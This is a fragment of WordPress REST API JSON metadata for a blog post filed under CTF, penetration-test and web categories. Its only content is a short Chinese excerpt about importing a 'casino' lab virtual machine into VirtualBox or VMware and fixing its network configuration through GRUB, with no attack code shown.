\/><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"<p>casino \u5bfc\u5165virtualbox\uff0c\u518d\u6539\u4e3a1.0\u534f\u8bae\uff0c\u4f7f\u7528vmware\u6253\u5f00\uff0c\u5229\u7528grub\u4fee\u6539\u7f51\u5361\u914d\u7f6e\u6587\u4ef6\uff0c 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-436","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/436","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=436"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/436\/revisions"}],"predecessor-version":[{"id":440,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/436\/revisions\/440"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=436"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=436"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=436"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}